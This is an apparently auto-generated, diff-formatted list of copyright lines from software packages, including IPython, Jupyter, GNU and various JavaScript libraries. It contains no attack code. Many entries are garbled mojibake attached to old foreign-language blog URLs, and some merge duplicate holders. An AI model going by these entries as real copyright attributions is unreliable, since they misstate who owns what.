+(c) lPi$?JotAAdege!A1962 (c) uu?i 1/41o 2003 CN1o
+Copyright (c) 2001-2015, IPython Development Team
+Copyright (c) 2005 Free Software Foundation, Inc.
+Copyright (c) 2005, CigarMinds Kft. 2006. 01. 04.
+Copyright (c) 2006 Tim Cera timcera@earthlink.net
+Copyright (c) 2009 Thomas Robinson <280north.com>
+Copyright (c) 2011 Free Software Foundation, Inc.
+Copyright (c) 2011, the IPython Development Team.
+Copyright (c) 2012 Free Software Foundation, Inc.
+Copyright (c) 2012, Noah Spurrier <noah@noah.org>
+Copyright (c) 2012, the IPython Development Team.
+Copyright (c) 2013 Ted Unangst <tedu@openbsd.org>
+Copyright (c) 2013, the IPython Development Team.
+Copyright (c) 2013-2014, Pexpect development team
+Copyright (c) 2013-2016, Pexpect development team
+Copyright (c) 2014 Free Software Foundation, Inc.
+Copyright (c) 2014 Ted Unangst <tedu@openbsd.org>
+Copyright (c) 2016, the IPython Development Team.
+Copyright (c) Isaac Z. Schlueter and Contributors
+Copyright 2005 rdf:resource http://blog.empas.com
+Copyright 2008 Jack Miller (https://codezen.org/)
+Copyright 2014 Lucas Bajolet <r4pass@hotmail.com>
+Copyright 2017-2019 Jason R. Coombs, Barry Warsaw
+copyright 2015, Jupyter Team, https://jupyter.org
+copyright 2016 Copyright 2016-2017 Andrew Svetlov
+(c) -deg!Ao http://jowchung.oolim.net/index.php?pl
+(c) A$?AE+-eEnA aAu http://px.a8.net/svt/ejp?a8mat
+(c) Oa,o thInuAIoO3/4EC http://www.messagecast.net
+Copyright (c) 1997 Niels Provos <provos@umich.edu>
+Copyright (c) 2001-2016 Python Software Foundation
+Copyright (c) 2008-2011, IPython Development Team.
+Copyright (c) 2008-2015, IPython Development Team.
+Copyright (c) 2010 Brian Granger, Min Ragan-Kelley
+Copyright (c) 2010 Min Ragan-Kelley, Brian Granger
+Copyright (c) 2010-2011, IPython Development Team.
+Copyright (c) 2011 Nathaniel Smith <njs@pobox.com>
+Copyright (c) 2012 Nathaniel Smith <njs@pobox.com>
+Copyright (c) 2013 Nathaniel Smith <njs@pobox.com>
+Copyright (c) 2013-2017, Nucleic Development Team.
+Copyright (c) 2013-2019, Nucleic Development Team.
+Copyright (c) 2014 Ivan Nikulin <ifaaan@gmail.com>
+Copyright (c) 2014-2016, Jupyter Development Team.
+Copyright (c) 2014-2017, Jupyter Development Team.
+Copyright (c) 2014-2018, Nucleic Development Team.
+Copyright (c) 2015 Thomas Kluyver and contributors
+Copyright (c) 2015-2016 Will Bond <will@wbond.net>
+Copyright (c) <2013> Copyright (c) Maxim Kurnikov.
+Copyright 1992-2019 Free Software Foundation, Inc.
+Copyright 2011 Mozilla Foundation and contributors
+Copyright 2014 Mozilla Foundation and contributors
+Copyright 2015-present Palantir Technologies, Inc.
+Copyright 2017-present Palantir Technologies, Inc.
+Copyright Waylan Limberg (http://achinghead.com/).
+(c) Copyright 2014-2018 Enthought, Inc., Austin, TX
+(c) a(r)$?Y aa http://money.rin.ru/content/news/?id
+(c) http://nanana.moo.jp/archives/000922.html Y ThY
+Copyright (c) 2001 Janko Hauser <jhauser@zscout.de>
+Copyright (c) 2008 Alan Woodland <ajw05@aber.ac.uk>
+Copyright (c) 2008 Guido U. Draheim <guidod@gmx.de>
+Copyright (c) 2014 GDF Suez, http://www.gdfsuez.com
+Copyright (c) 2015 Copyright (c) 2015 Thomas Pornin
+Copyright (c) 2015 Jukka Lehtosalo and contributors
+Copyright (c) 2018 Isaac Muse <isaacmuse@gmail.com>
+Copyright 2007, 2008 Chris Wanstrath chris@ozmm.org
+Copyright 2011 Alex Levenson <alex@isnotinvain.com>
+Copyright Joyent, Inc. and other Node contributors.
+Copyright jQuery Foundation and other contributors.
+copyright (c) 2015 Daniel Dinu, Dmitry Khovratovich
+(c) 2012 Denny Vrandecic (http://denny.vrandecic.de)
+(c) a http://www.greek.ru/ru/news/news_detail.php?ID
+(c) cC$?1/4I http://sasuga.biz/pages/index.php?refid
+(c) http://www.newsru.com/crime/03jan2006/minsk.html
+Copyright (c) 1998,1999,2000,2001,2002 Tal Davidson.
+Copyright (c) 2001, Janko Hauser <jhauser@zscout.de>
+Copyright (c) 2008-2011 The IPython Development Team
+Copyright (c) 2008-2012 The IPython Development Team
+Copyright (c) 2008-Present, IPython Development Team
+Copyright (c) 2009-2010, Gary L. Cutler, GPL Comment
+Copyright (c) 2009-2011 The IPython Development Team
+Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh
+Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh
+Copyright (c) 2015- - Paul Ganssle <paul@ganssle.io>
+Copyright (c) 2018, Andrea Giammarchi, WebReflection
+Copyright 2011 Reya Group <http://www.reyagroup.com>
+copyright https://docs.python.org/2.7/copyright.html
+copyright u'Brian E. Granger & Min Ragan-Kelley. OMQ
+(c) <a href https://www.openstreetmap.org/copyright'>
+(c) a? http://andore.com/inami/mtarchives/003381.html
+(c) eaOOc, a'o'O http://money.rin.ru/content/news/?id
+(c) u2oAuIa http://club.h14m.org/kenji/diary/?200512b
+Copyright (c) 2009-2011 Copyright 2009 Brian Quinlan.
+Copyright (c) 2010-2011 The IPython Development Team.
+Copyright (c) 2013-2019 Copyright 2009 Colin Percival
+Copyright (c) 2014 Jeff Quast <contact@jeffquast.com>
+Copyright (c) <2013-2017> Copyright 2006 Google, Inc.
+Copyright (c) Zope Corporation (tm) and Contributors.
+Copyright 2000, 2004, 2005Adobe Systems Incorporated.
+Copyright 2009 Waylan Limberg (http://achinghead.com)
+Copyright 2011 Waylan Limberg (http://achinghead.com)
+Copyright 2016-2018, Andrew Svetlov and aio-libs team
+copyright 2016-2018, Andrew Svetlov and aio-libs team
+(c) Copyright 2008 by <a href http://domain.invalid/'>
+(c) Copyright 2010 by <a href http://domain.invalid/'>
+(c) a http://www.newsru.com/russia/03jan2006/gruz.html
+(c) http://www.newsru.com/crime/03jan2006/germanz.html
+Copyright (c) 1991, Jos van der Woude, jvdwoude@hut.nl
+Copyright (c) 1994-2018 Free Software Foundation, Inc.
+Copyright (c) 1996-2013 Free Software Foundation, Inc.
+Copyright (c) 1996-2015 Free Software Foundation, Inc.
+Copyright (c) 1996-2018 Free Software Foundation, Inc.
+Copyright (c) 1997-2018 Free Software Foundation, Inc.
+Copyright (c) 1999-2013 Free Software Foundation, Inc.
+Copyright (c) 1999-2018 Free Software Foundation, Inc.
+Copyright (c) 2001 Nathaniel Gray <n8gray@caltech.edu>
+Copyright (c) 2001-2017 David M. Beazley David Beazley
+Copyright (c) 2001-2018 Free Software Foundation, Inc.
+Copyright (c) 2002-2018 Free Software Foundation, Inc.
+Copyright (c) 2003-2018 Free Software Foundation, Inc.
+Copyright (c) 2004-2015 Free Software Foundation, Inc.
+Copyright (c) 2004-2018 Free Software Foundation, Inc.
+Copyright (c) 2006-2018 Free Software Foundation, Inc.
+Copyright (c) 2008-2013 Free Software Foundation, Inc.
+Copyright (c) 2009-2018 Free Software Foundation, Inc.
+Copyright (c) 2010 Brian E. Granger & Min Ragan-Kelley
+Copyright (c) 2010-2015 Free Software Foundation, Inc.
+Copyright (c) 2010-2015 Jeremy Ashkenas, DocumentCloud
+Copyright (c) 2011-2018 Free Software Foundation, Inc.
+Copyright (c) 2012-2017 Kirollos Risk (http://kiro.me)
+Copyright (c) 2013 Brian E. Granger & Min Ragan-Kelley
+Copyright (c) 2014-2016 Ian Lee <IanLee1521@gmail.com>
+Copyright 2012 (c) Mihai Bazon <mihai.bazon@gmail.com>
+Copyright Petri Savolainen <firstname.lastname@iki.fi>
+copyright u'2010 (c) Ronny Pfannschmidt, Holger Krekel
+(c) 2006 Entrust, Inc. Label Entrust Root Certification
+(c) uA1/2IAd uaC/eBgp^CI http://px.a8.net/svt/ejp?a8mat
+Copyright (c) 1989, 1991 Free Software Foundation, Inc.
+Copyright (c) 1991, 1999 Free Software Foundation, Inc.
+Copyright (c) 1995-2003 by Internet Software Consortium
+Copyright (c) 2001 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2001, Nathaniel Gray <n8gray@caltech.edu>
+Copyright (c) 2010-2012 Brian Granger, Min Ragan-Kelley
+Copyright (c) 2011 Daniel Richard G. <skunk@iSKUNK.ORG>
+Copyright (c) 2011-2012 Nathaniel Smith <njs@pobox.com>
+Copyright (c) 2011-2013 Nathaniel Smith <njs@pobox.com>
+Copyright (c) 2011-2014 Nathaniel Smith <njs@pobox.com>
+Copyright (c) 2011-2015 Nathaniel Smith <njs@pobox.com>
+Copyright (c) 2012-2013 Nathaniel Smith <njs@pobox.com>
+Copyright (c) 2012-2014 Antoine Pitrou and contributors
+Copyright 2009-2011 Mozilla Foundation and contributors
+Copyright 2010 by Armin Ronacher. :license Flask Design
+Copyright 2011 Waylan Limberg (http://achinghead.com/).
+Copyright 2012-2018 Dmitry Shachnev <mitya57@gmail.com>
+Copyright 2013 Alexis Laferriere <alexis.laf@xymus.net>
+Copyright 2013 Matthieu Lucas <lucasmatthieu@gmail.com>
+Copyright 2014 Alexis Laferriere <alexis.laf@xymus.net>
+Portions Copyright (c) 2009 David Jones <drj@pobox.com>
+copyright 2006. (c) Justin Fletcher Copyright 1999-2011
+(c) $?AE http://mimizun.com:81/blog/archives/000314.html
+(c) c http://www.topre.co.jp/products/comp/key_list.html
+(c) deg! i3/4u3/4i?? http://zangsalang.egloos.com/594634
+(c) e http://webryblog.biglobe.ne.jp/2/d/2d5396c6b9.html
+(c) e http://webryblog.biglobe.ne.jp/7/5/75575704c2.html
+Copyright (c) 2005 Fernando Perez. <fperez@colorado.edu>
+Copyright (c) 2009-2012, Brian Granger, Min Ragan-Kelley
+Copyright (c) 2011 Maarten Bosmans <mkbosmans@gmail.com>
+Copyright (c) 2012 Senko Rasic <senko.rasic@dobarkod.hr>
+Copyright (c) 2013 Yusuke Suzuki <utatane.tea@gmail.com>
+Copyright (c) 2014 Yusuke Suzuki <utatane.tea@gmail.com>
+Copyright 2011 Brian Neal (https://deathofagremmie.com/)
+Copyright 2013 Donald Stufft and individual contributors
+Copyright 2014 Donald Stufft and individual contributors
+Copyright 2016 Donald Stufft and individual contributors
+Copyright 2017 Donald Stufft and individual contributors
+Copyright 2018 Donald Stufft and individual contributors
+copyright f'2004- date.today().year, NetworkX Developers
+(c) EIC/~UcEC/B http://andore.com/mt/archives/003192.html
+(c) c http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050225/1
+(c) cC$?1/4@ < /> http://www.accesstrade.net/at/c.html?rk
+(c) oSS http://music.peeps.ru/news/s/2003/03/12/1366.html
+Copyright (c) 2008 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2009 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2009-2014 Luke Maurits <luke@maurits.id.au>
+Copyright (c) 2014-2016 - Yaron de Leeuw <me@jarondl.net>
+Copyright 2014, 2015, 2016 Ori Livneh <ori@wikimedia.org>
+copyright 2013, Donald Stufft and Individual Contributors
+copyright 2015, Mark Pilgrim, Dan Blanchard, Ian Cordasco
+Copyright (c) 2009-2014, Luke Maurits <luke@maurits.id.au>
+Copyright (c) 2012 Ariya Hidayat <ariya.hidayat@gmail.com>
+Copyright (c) 2013 Torsten Landschoff <torsten@debian.org>
+Copyright (c) 2018 - 2020 Isaac Muse <isaacmuse@gmail.com>
+Copyright (c) 2019 Copyright (c) IPython Development Team.
+copyright 2016 Sean Connelly (@voidqk), http://syntheti.cc
+(c) !x!O http://www.aozora.gr.jp/cards/000050/card1174.html
+(c) $?A3/4a$?2$?e http://club.h14m.org/kenji/diary/?200512b
+(c) 2019 Josh Johnson https://github.com/jshjohnson/Choices
+Copyright (c) 2004, 2007 Chad Miller <http://web.chad.org/>
+Copyright (c) 2006-2013 James Graham and other contributors
+Copyright (c) 2008 Steven G. Johnson <stevenj@alum.mit.edu>
+Copyright (c) 2010 Diego Elio Petteno <flameeyes@gmail.com>
+Copyright (c) 2010-2011 Brian E. Granger & Min Ragan-Kelley
+Copyright (c) 2016 The IPython Team <ipython-dev@scipy.org>
+Copyright 1997 Niels Provos <provos@physnet.uni-hamburg.de>
+Copyright 2007-2008 Waylan Limberg (http://achinghead.com).
+copyright u'2013 Copyright (c) Twisted Matrix Laboratories.
+(c) AEnT~I..... http://andore.com/money/archives/003302.html
+(c) a http://www.amefoot.net/archives/2005/05/13_000876.html
+(c) aae (r)aY aa(r)C/ea http://money.rin.ru/content/news/?id
+(c) ae O!o!SS http://www.greek.ru/ru/news/news_detail.php?ID
+(c) eAEAu http://fudemame-guide.com/fude15/faq/fmF15106.html
+(c) http://www.bphrs.net/mesi/archives/2005/04/post_110.html
+(c) http://www.bphrs.net/mesi/archives/2005/07/post_116.html
+Copyright (c) 2001-2004 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2001-2005 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2001-2006 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2003 John Gruber <https://daringfireball.net/>
+Copyright (c) 2003-2007 John Rochester <john@jrochester.org>
+Copyright (c) 2004, 2011-2015 Free Software Foundation, Inc.
+Copyright (c) 2004-2010 by Internet Systems Consortium, Inc.
+Copyright (c) 2005-2006 Fernando Perez <fperez@colorado.edu>
+Copyright (c) 2012, Regents of the University of California.
+Copyright (c) 2014, Ramalingam Saravanan <sarava@sarava.net>
+Copyright (c) 2019 Edgar Sousa <https://github.com/edgsousa>
+Copyright 2006-2008 Waylan Limberg (http://achinghead.com/).
+Copyright 2007-2008 Waylan Limberg (http://achinghead.com/).
+Copyright 2012-2013 Alexis Laferriere <alexis.laf@xymus.net>
+Copyright 2013 Hardcoded Software (http://www.hardcoded.net)
+copyright Rick Jelliffe and Academia Sinica Computing Center
+(c) N3/4-CAZNV GvdaIuAeAC/e http://ore-1gpy.cocolog-nifty.com
+(c) http://www.pinkupa.com/cgi-bin/weblog/archives/000611.php
+(c) http://www.pinkupa.com/cgi-bin/weblog/archives/000616.php
+Copyright (c) 2001 Python Software Foundation, www.python.org
+Copyright (c) 2001-2007 Fernando Perez. <fperez@colorado.edu>
+Copyright (c) 2002-2006 Fernando Perez. <fperez@colorado.edu>
+Copyright (c) 2005-2006 Fernando Perez. <fperez@colorado.edu>
+Copyright (c) 2009 The R Foundation for Statistical Computing
+Copyright (c) 2012-2013 Yusuke Suzuki <utatane.tea@gmail.com>
+Copyright (c) 2013 by Christian Heimes <christian@python.org>
+Copyright (c) 2013-2014 Yusuke Suzuki <utatane.tea@gmail.com>
+Copyright (c) 2017 Copyright (c) 1993-2003 Yukihiro Matsumoto
+Copyright (c) 2017-???? Dave Halter <davidhalter88@gmail.com>
+Copyright 1996 Institut National de Recherche en Informatique
+Copyright 2013-2017 Donald Stufft and individual contributors
+Copyright 2013-2018 Donald Stufft and individual contributors
+Copyright 2013-2019 Donald Stufft and individual contributors
+Copyright 2016-2019 Donald Stufft and individual contributors
+(c) +-,AC 3/4o+-1/4AIdeg!? http://zangsalang.egloos.com/592609
+(c) ,(r)1/2oA A-'O http://www.acnnewswire.net/Article.Asp?lang
+(c) 13/4!O http://www.aozora.gr.jp/cards/000275/card45513.html
+(c) 13/4!O http://www.aozora.gr.jp/cards/000275/card45514.html
+(c) 2000-2003 by cYcnus visit www.cYcnus.de licenser@cYcnus.de
+(c) PSC/ a$? http://www.aviaport.ru/news/2006/01/02/99276.html
+(c) cC$?1/4@ < /> http://click.linksynergy.com/fs-bin/click?id
+(c) http://contents-factory.com/blog/archives/200511301334.php
+(c) http://furusatonoeki.cutegirl.jp/main/archives/001172.html
+(c) l+-u'u3o W http://www.ebao.us/portal/showcontent.asp?INDEX
+(c) uAc 05/12/26@ http://blog.inkase.net/2005/12/html_404.html
+Copyright (c) 2003-2006 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2003-2007 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2003-2008 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2003-2009 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2003-2011 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2005 John Arbash-Meinel <john@arbash-meinel.com>
+Copyright (c) 2006 Johann C. Rocholl <johann@browsershots.org>
+Copyright (c) 2006-2007 Robey Pointer <robeypointer@gmail.com>
+Copyright (c) 2006-2009 Johann C. Rocholl <johann@rocholl.net>
+Copyright (c) 2010-2013 Arthur Clemens, arthur@visiblearea.com
+Copyright (c) 2013-2014 Copyright 2007-2018 by the Sphinx team
+(c) 1OOUWikiuAIoA?PS!xOE http://ccca.nctu.edu.tw/~hlb/tavi/WiKi
+(c) AAw http://affiliate-school.com/products/letter.html target
+(c) Copyright 2016, Sean Connelly (@voidqk), http://syntheti.cc
+(c) Copyright 2017, Sean Connelly (@voidqk), http://syntheti.cc
+(c) albgAaeEEA1/2eauAecuC/Bu+-$?IEl3na!RAaiAAenPaEC/I (c) EEEEB
+Copyright (c) 2003-2019 Stuart Bishop <stuart@stuartbishop.net>
+Copyright (c) 2008 The Regents of the University of California.
+Copyright 2014, 2015, 2016, 2017 Ori Livneh <ori@wikimedia.org>
+Punctuation (c) Copyright 2006 by <a href http://mydomain.tld'>
+portions Copyright (c) 2006 Nicko van Someren <nicko@nicko.org>
+(c) !E http://www.pinkupa.com/cgi-bin/weblog/archives/000612.php
+(c) EH http://tamuyou.haun.org/mt/archives/2006/01/post_383.html
+(c) O'1N!3/4N21O I?uiaCAia http://www.opentle.org/modules.php?op
+Copyright (c) 2001, Fernando Perez <fernando.perez@colorado.edu>
+Copyright (c) 2006 Kashia Buch (kashia@vfemail.net), Fabian Buch
+copyright u'2012-2015, James Socol 2015-2017, Mozilla Foundation
+(c) !a http://furusatonoeki.cutegirl.jp/main/archives/001177.html
+(c) IA3!C U!O 31/2i!C http://www.upsaid.com/isis/index.php?action
+(c) Lionhardt Technologies 2003, www.lionhardt.com/bb Wed, 04 Jan
+Copyright (c) 1985-1986, 1992, 1994-1995, 1999-2015 Free Software
+Copyright (c) 1992-1996, 1998-2012 Free Software Foundation, Inc.
+Copyright (c) 1996-2001, 2003-2015 Free Software Foundation, Inc.
+Copyright (c) 2000 Information-technology Promotion Agency, Japan
+Copyright (c) 2000 Network Applied Communication Laboratory, Inc.
+Copyright (c) 2003-2011 - Gustavo Niemeyer <gustavo@niemeyer.net>
+Copyright (c) 2011 Nokia Corporation and/or its subsidiary(-ies).
+Copyright (c) 2016, Martin Packman <martin.packman@canonical.com>
+(c) 1/4ONuE1/2 http://www.w3cn.org/article/translate/2005/115.html
+(c) Ac?I $?E$?I!C/ http://iriz.hanazono.ac.jp/frame/k_room_f1.html
+(c) Casper da Costa-Luis casperdcl (https://github.com/casperdcl).
+(c) Ivan Sagalaev <Maniac@SoftwareManiacs.Org> Adapted from GitHub
+(c) eEue1/2 http://px.a8.net/svt/ejp?a8mat (http://www.dabeaz.com)
+Copyright (c) 2005 Jorgen Stenarson <jorgen.stenarson@bostream.nu>
+Copyright (c) 2013-2017 by Christian Heimes <christian@python.org>
+Copyright (c) 2019 Ahmed TAHRI Ousret (https://github.com/Ousret).
+Copyright 2009-2013, MetaQuotes Software Corp. http://www.mql4.com
+(c) (c) AA+-C/IAtBGCgxI j AaaAAEIieUu1/2B http://www.1affilaite.com
+(c) 3U!A http://furusatonoeki.cutegirl.jp/main/archives/001182.html
+Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam
+Copyright (c) 1996-2016 by the PostgreSQL Global Development Group.
+Copyright (c) 2007 Free Software Foundation, Inc. <http://fsf.org/>
+Copyright (c) 2009-2014 Florent Xicluna <florent.xicluna@gmail.com>
+(c) IoA3/4!E !C/ http://www.aozora.gr.jp/cards/001154/card44333.html
+(c) M http://www.literature.org/authors/carroll-lewis/ Lewis Carroll
+(c) cEEEEE http://tamuyou.haun.org/mt/archives/2005/12/post_379.html
+(c) uAA!EINuE1/2AD+-i http://www.w3cn.org/article/tips/2005/116.html
+Copyright (c) 1994-5 by the Regents of the University of California.
+Copyright (c) 2008-2011 The Regents of the University of California.
+Copyright (c) 2012-2014 - Tomi Pievilainen <tomi.pievilainen@iki.fi>
+Copyright 2012-2015 The Dojo Foundation <http://dojofoundation.org/>
+(c) -deg!Ao 1/4on1/2o, AC/COo,'I title http://xenix.egloos.com/189169
+(c) aueEC/a http://tamuyou.haun.org/mt/archives/2005/12/post_377.html
+(c) http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss
+Copyright (c) 1995-2001 Corporation for National Research Initiatives
+Copyright (c) 2001-2007, Fernando Perez <fernando.perez@colorado.edu>
+Copyright (c) 2005-2006 Fernando Perez. <Fernando.Perez@colorado.edu>
+Copyright 2004, by Alberto Santini http://www.albertosantini.it/chess
+Copyright JS Foundation and other contributors, https://js.foundation
+(c) deg!uE+-i? http://jely.pe.kr/archives/2004/10/20041021_000236.html
+Copyright (c) Jean-Paul Calderone 2008-2015 u'The pyOpenSSL developers
+Copyright jQuery Foundation and other contributors, https://jquery.org
+Copyright (c) 1984, 1985, 1988, 2010 Howard Trickey and Oren Patashnik.
+Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)
+(c) 1Uua$?B src http://www.beginnersrack.com/mt/images/20050429_soba.jpg
+(c) C/eC/eEiTha eY1/2C/A aAGGIEI http://nefdesfous.free.fr/sculpture.htm
+(c) cC$?1/4@ < /> http://ck.jp.ap.valuecommerce.com/servlet/referral?sid
+(c) uA1OOUGoogleOA -uADAIC/ http://www.coverer.com/archives/000832.shtml
+Copyright (c) 2014 Yehuda Katz, Tom Dale, Stefan Penner and contributors
+Copyright 2006-2014, MetaQuotes Software Corp. http://www.metaquotes.net
+Copyright 2011 Diederik van Liere <diederik.vanliere@rotman.utoronto.ca>
+(c) <a href http://downloads.esri.com/ArcGISOnline/docs/tou_summary.pdf'>
+(c) A1/2 http://www.cycle-yoshida.com/trek/nike/shoes/mtb/5kato3_page.htm
+(c) Ca http://blog.bd-lab.com/blog/archives/000130.html Ao3 +-Y?aAI Au3a.
+(c) Ca!ae,N Yxaae!iC, !o! O! eCa!,Oe http://money.rin.ru/content/news/?id
+Copyright OpenJS Foundation and other contributors <https://openjsf.org/>
+(c) PS+-PSuoD3/4-1/2/E'$?-$?E$?e http://azoz.org/archives/200511260855.php
+Copyright (c) 2000,2001 Rick Jelliffe and Academia Sinica Computing Center
+Copyright (c) 2000-2008 Rick Jelliffe and Academia Sinica Computing Center
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation
+Copyright (c) 2001, 2006 Rick Jelliffe and Academia Sinica Computing Center
+Copyright (c) 2009 Benjamin Kowarsch. Leaf Corcoran (leafot@gmail.com) 2011
+(c) O$?E2n$?A$?AE$?$?Th$? $?? http://akaname.main.jp/mt/archives/000127.html
+Copyright (c) 2004-2005, 2007-2008, 2011-2015 Free Software Foundation, Inc.
+Copyright (c) 2004-2005, 2007-2009, 2011-2015 Free Software Foundation, Inc.
+Copyright 1999-2004, Slavei Karadjov slaff@linux-bg.org support@linux-bg.org
+copyright 2014-2019 Copyright (c) Donald Stufft and individual contributors.
+(c) Copyright 2006 Salvatore Filippone University of Rome Tor Vergata Comment
+(c) u http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+Copyright (c) 2004-2005, 2007, 2009, 2011-2015 Free Software Foundation, Inc.
+Copyright (c) 2010-2017 Copyright 2008 Waylan Limberg (http://achinghead.com)
+(c) Ae,A !x!C/Y EY $?Y e!O http://www.aozora.gr.jp/cards/000009/card45340.html
+Copyright (c) 2006-2013 James Graham, Geoffrey Sneddon, and other contributors
+Copyright (c) 2018 - 2020 <a href https://github.com/facelessuser'> Isaac Muse
+Copyright 2005, ACN Newswire corp@asiacorpnet.com tim.mckinnon@asiacorpnet.com
+Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
+(c) ,oua'O http://archmond.mizc.com/tt target blank http://archmond.mizc.com/tt
+(c) C/3/4aAOoI http://www.y-moto.com/bd-1/archives/2005/12/post_267.html'target
+(c) I'IauAWi http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html
+(c) ID1UA1/2 http://www.cnblog.org/blog/archives/2004_08_22_cnblog_archive.html
+Copyright (c) 2018 Isaac Muse <isaacmuse@gmail.com> The Python-Markdown Project
+Copyright (c) 2019 Ahmed TAHRI Ousret (https://github.com/Ousret). This project
+Copyright (c) 2014, 2015, 2016 Philip Withnall <philip.withnall@collabora.co.uk>
+Copyright 1996 Institut National de Recherche en Informatique et Comment Comment
+copyright 2006-2014, MetaQuotes Software Corp. property link http://www.mql4.com
+(c) degi3/4uI PS!u < > NUe$?!PS!P http://www.blogchina.com/new/display/57469.html
+(c) o3C/ OaoY I$?eAO1IY i'PS a http://fudesign.blogspot.com/2005/08/august-8.html
+Copyright (c) 1984, 1985, 1988, 2010 Howard Trickey and Oren Patashnik. Unlimited
+(c) !(r)E3o$?a3/4C1/4u3o3/4E$?a3/4C1/4u!A a http://ilyagram.org/archives/1683.html
+(c) o$?@$?e$?@$?e$?W$?E$?Q(r)EA ae http://www.ebao.us/portal/showcontent.asp?INDEX
+Copyright (c) 1985-1986, 1992, 1994-1995, 1999-2015 Free Software Foundation, Inc.
+(c) 1999 Entrust.net Limited Label Entrust.net Premium 2048 Secure Server CA Serial
+(c) ?IPSoODEIOu1/4UOuIThO-AuAPSE1/2 http://blog.westca.com/blog_a/p_full/44725.html
+(c) o aSS1I http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+(c) oC/wC/w http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+(c) <a href https://foundation.wikimedia.org/wiki/Maps_Terms_of_Use'> Wikimedia Maps
+(c) c@ http://www.teizouteiki.jp/contact.html http://www.teizouteiki.jp/contact.html
+(c) idegPS W3O1/2x3/4 2005-12-30T18:40:48+08:00 domain http://www.technorati.com/tag
+(c) AU+-a ?i?iCss3/4udego..'U1/2A AC o A1/4AIAa.. .... http://oroll.egloos.com/986804
+(c) HTML-$?(r)aa!Y a http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss
+(c) I1/4OCAAE(r)deg! http://research.microsoft.com/barc/mediapresence/MyLifeBits.aspx
+(c) $?E x$? $?-$?e$?$?!C/1P1/4e$?E$?aC/II$?C$? $??!PS src http://ch.kitaguni.tv/u/8280
+(c) o2O'aoaA Y http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 Python Software Foundation
+Copyright 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
+(c) nPAB 3/4u(11/24)aCxgaAAeIAiC/1/2C/uIC$?1/4BBB http://orf.sfc.keio.ac.jp/index.html...
+Copyright (c) 2006 Kashia Buch (kashia@vfemail.net), Fabian Buch (fabian@fabian-buch.de).
+Copyright 2015 Daniel Dinu, Dmitry Khovratovich, Jean-Philippe Aumasson, and Samuel Neves
+Copyright content Knut Muller, Alexander Wolf, Uwe Ritzschke, Paul-Robert Achcenich, 2006
+Copyright (c) 2012-2013, Christopher Jeffrey (MIT License) https://github.com/chjj/term.js
+(c) 2010-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors Backbone
+Copyright (c) 1984, 1989, 1990, 2000, 2001, 2002, 2003, 2004 Free Software Foundation, Inc.
+Copyright (c) 2008 Stefan van der Walt <stefan@mentat.za.net> , Pauli Virtanen <pav@iki.fi>
+(c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input
+(c) iC/C/ISSvAEvAAYAC/1/2n3/4aA http://www.nisshin.com/life/cm/tvcm_mama0915.html u't YIAfeB
+(c) iO http://10e.org/mt/archives/200512/280341.php http://anime.livedoor.com/theater/2.html
+(c) ieE ssStAEC/$?+-AEAAmeC/AEctOStEsA1/2BsA1/2II http://wa2.e-golf.co.jp/gp/nh/cb/cb133.htm
+(c) w+-uoTh1/4OY I!C http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+Copyright (c) 2009-2018 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
+(c) 2009-2013 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors Underscore
+(c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors Underscore
+(c) 2009-2018 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors Underscore
+(c) 2uA http://10e.org/mt/archives/200512/280410.php http://10e.org/samcimg3/nekonekoneko.jpg
+(c) OeI'uO o1/2th1yEEIauAPS!Oa2AECIOEuO,IyO,IAuA!PS zh rdf:resource http://b2evolution.net/?v
+Copyright 2006, C IAOOAIDINEEC - D. AEAIAOEAACO OEA A.A. webmaster@naftemporiki.gr Wed, 4 Jan
+(c) IAE~(r)uY ~?aAD1qPx http://www.coolloud.org.tw/news/database/interface/detailstander.asp?ID
+Copyright (c) 2011-2018, Christopher Jeffrey. (MIT Licensed) https://github.com/markedjs/marked
+(c) 2009-2013 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors // Underscore
+(c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors // Underscore
+(c) $?oE1/21/4'$? $??$?$?3/4i1c$?I http://msdn.microsoft.com/workshop/author/VML/ref/appendix.asp
+(c) cC$?1/4o < http://www.cycle-surf.com/?ref 11'> SRC http://inkase.net/images/traffic/cycle.gif
+Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2003, 2004, 2005 Free Software Foundation, Inc.
+Copyright Paul Johnston 2000 - 2002. Other contributors Greg Holt, Andrew Kepert, Ydnar, Lostinet
